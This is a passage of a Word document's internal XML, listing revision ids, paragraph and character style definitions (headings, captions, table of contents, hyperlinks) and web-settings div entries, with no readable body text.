    <w:rsid w:val="00C45442"/>
    <w:rsid w:val="00C500CD"/>
    <w:rsid w:val="00C51A1A"/>
    <w:rsid w:val="00C525C7"/>
    <w:rsid w:val="00C56305"/>
    <w:rsid w:val="00C60196"/>
    <w:rsid w:val="00C62525"/>
    <w:rsid w:val="00C63970"/>
    <w:rsid w:val="00C66A05"/>
    <w:rsid w:val="00C73690"/>
    <w:rsid w:val="00C92C7D"/>
    <w:rsid w:val="00C93DB6"/>
    <w:rsid w:val="00C9424D"/>
    <w:rsid w:val="00C973CF"/>
    <w:rsid w:val="00CA1AEF"/>
    <w:rsid w:val="00CA6920"/>
    <w:rsid w:val="00CB3FAC"/>
    <w:rsid w:val="00CC0C0B"/>
    <w:rsid w:val="00CD4CB3"/>
    <w:rsid w:val="00CD556F"/>
    <w:rsid w:val="00CE7B77"/>
    <w:rsid w:val="00CF077E"/>
    <w:rsid w:val="00CF1493"/>
    <w:rsid w:val="00CF22DD"/>
    <w:rsid w:val="00D01F87"/>
    <w:rsid w:val="00D03D21"/>
    <w:rsid w:val="00D11EE7"/>
    <w:rsid w:val="00D11FED"/>
    <w:rsid w:val="00D14275"/>
    <w:rsid w:val="00D15150"/>
    <w:rsid w:val="00D17E2A"/>
    <w:rsid w:val="00D17EE5"/>
    <w:rsid w:val="00D22AC8"/>
    <w:rsid w:val="00D26AF5"/>
    <w:rsid w:val="00D26C9E"/>
    <w:rsid w:val="00D30FE1"/>
    <w:rsid w:val="00D32649"/>
    <w:rsid w:val="00D32ED3"/>
    <w:rsid w:val="00D370AF"/>
    <w:rsid w:val="00D42607"/>
    <w:rsid w:val="00D42C86"/>
    <w:rsid w:val="00D5205D"/>
    <w:rsid w:val="00D56635"/>
    <w:rsid w:val="00D72550"/>
    <w:rsid w:val="00D7500C"/>
    <w:rsid w:val="00D8127C"/>
    <w:rsid w:val="00D87EF4"/>
    <w:rsid w:val="00D907E1"/>
    <w:rsid w:val="00D90AA0"/>
    <w:rsid w:val="00D92C26"/>
    <w:rsid w:val="00D92F46"/>
    <w:rsid w:val="00D94BDA"/>
    <w:rsid w:val="00DA04E1"/>
    <w:rsid w:val="00DB15A5"/>
    <w:rsid w:val="00DB2D4C"/>
    <w:rsid w:val="00DB49AE"/>
    <w:rsid w:val="00DC3F5C"/>
    <w:rsid w:val="00DC60B1"/>
    <w:rsid w:val="00DC7DDE"/>
    <w:rsid w:val="00DD628B"/>
    <w:rsid w:val="00DE0682"/>
    <w:rsid w:val="00DE075B"/>
    <w:rsid w:val="00DF08E2"/>
    <w:rsid w:val="00DF6B0B"/>
    <w:rsid w:val="00E05464"/>
    <w:rsid w:val="00E2646F"/>
    <w:rsid w:val="00E26D9F"/>
    <w:rsid w:val="00E31F6B"/>
    <w:rsid w:val="00E34E4E"/>
    <w:rsid w:val="00E364D7"/>
    <w:rsid w:val="00E41963"/>
    <w:rsid w:val="00E445CE"/>
    <w:rsid w:val="00E44D34"/>
    <w:rsid w:val="00E51210"/>
    <w:rsid w:val="00E53574"/>
    <w:rsid w:val="00E53CB7"/>
    <w:rsid w:val="00E56A43"/>
    <w:rsid w:val="00E646DE"/>
    <w:rsid w:val="00E672A8"/>
    <w:rsid w:val="00E7062B"/>
    <w:rsid w:val="00E73A17"/>
    <w:rsid w:val="00E73C40"/>
    <w:rsid w:val="00E76CFF"/>
    <w:rsid w:val="00E819FF"/>
    <w:rsid w:val="00E90A36"/>
    <w:rsid w:val="00EA2934"/>
    <w:rsid w:val="00EA3EC9"/>
    <w:rsid w:val="00EA4E51"/>
    <w:rsid w:val="00EA71C0"/>
    <w:rsid w:val="00EA77C6"/>
    <w:rsid w:val="00EB4378"/>
    <w:rsid w:val="00EC1DDA"/>
    <w:rsid w:val="00ED091A"/>
    <w:rsid w:val="00ED1330"/>
    <w:rsid w:val="00ED26F5"/>
    <w:rsid w:val="00ED493B"/>
    <w:rsid w:val="00EE0D90"/>
    <w:rsid w:val="00EE76F2"/>
    <w:rsid w:val="00EF2B8A"/>
    <w:rsid w:val="00EF58FF"/>
    <w:rsid w:val="00F05F19"/>
    <w:rsid w:val="00F06FEA"/>
    <w:rsid w:val="00F102F2"/>
    <w:rsid w:val="00F10476"/>
    <w:rsid w:val="00F11BB5"/>
    <w:rsid w:val="00F17DB1"/>
    <w:rsid w:val="00F21629"/>
    <w:rsid w:val="00F216DD"/>
    <w:rsid w:val="00F30840"/>
    <w:rsid w:val="00F33A57"/>
    <w:rsid w:val="00F33E00"/>
    <w:rsid w:val="00F41346"/>
    <w:rsid w:val="00F4418A"/>
    <w:rsid w:val="00F533E7"/>
    <w:rsid w:val="00F63473"/>
    <w:rsid w:val="00F7373B"/>
    <w:rsid w:val="00F73B87"/>
    <w:rsid w:val="00F73C0C"/>
    <w:rsid w:val="00F77A4C"/>
    <w:rsid w:val="00F77C71"/>
    <w:rsid w:val="00F85F5E"/>
    <w:rsid w:val="00F9318A"/>
    <w:rsid w:val="00F95A3B"/>
    <w:rsid w:val="00F9659F"/>
    <w:rsid w:val="00FA24D9"/>
    <w:rsid w:val="00FA2604"/>
    <w:rsid w:val="00FA40B2"/>
    <w:rsid w:val="00FA5535"/>
    <w:rsid w:val="00FB1472"/>
    <w:rsid w:val="00FB2DC8"/>
    <w:rsid w:val="00FB2F32"/>
    <w:rsid w:val="00FB3953"/>
    <w:rsid w:val="00FB778B"/>
    <w:rsid w:val="00FC0348"/>
    <w:rsid w:val="00FC0C30"/>
    <w:rsid w:val="00FC1E10"/>
    <w:rsid w:val="00FD1ED1"/>
    <w:rsid w:val="00FD35FB"/>
    <w:rsid w:val="00FE4B36"/>
    <w:rsid w:val="00FE63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6EFC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FBD0EA6A-7894-42B2-82C0-35BBF376F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360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>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26388"/>
    <w:pPr>
      <w:spacing w:after="122" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DE075B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="18"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00580F86"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="18"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C973CF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="18"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B94D16"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="18"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C437AB"/>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4BDA"/>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4BDA"/>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4BDA"/>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4BDA"/>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Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="ChapterChar"/>
    <w:qFormat/>
    <w:rsid w:val="00E445CE"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ChapterChar">
    <w:name w:val="Chapter Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Chapter"/>
    <w:rsid w:val="00E445CE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DE075B"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00580F86"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00AF4EA3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:rsid w:val="00C437AB"/>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rsid w:val="00C973CF"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B94D16"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00D94BD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94BD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94B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4BDA"/>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2487F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FB778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C0B89"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C0B89"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C0B89"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="260"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C0B89"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="520"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C0B89"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C0B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B89"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C0B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B89"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008D132E"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003725C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35336"/>
    <w:rPr>
      <w:color w:val="2B579A"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ListTable4-Accent3">
    <w:name w:val="List Table 4 Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="002C2B3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uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00503832"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B81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B81AF2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D073C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="007D073C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00FA5535"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FA55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4788">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2822952">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="35811579">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="36245497">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="54865671">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="72171291">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="78797205">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="79571116">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="84573516">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="87120153">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="87427024">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="89161057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="99183622">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="141237607">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="179203637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="196968190">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="213123172">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214858651">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="248465539">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="267590332">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
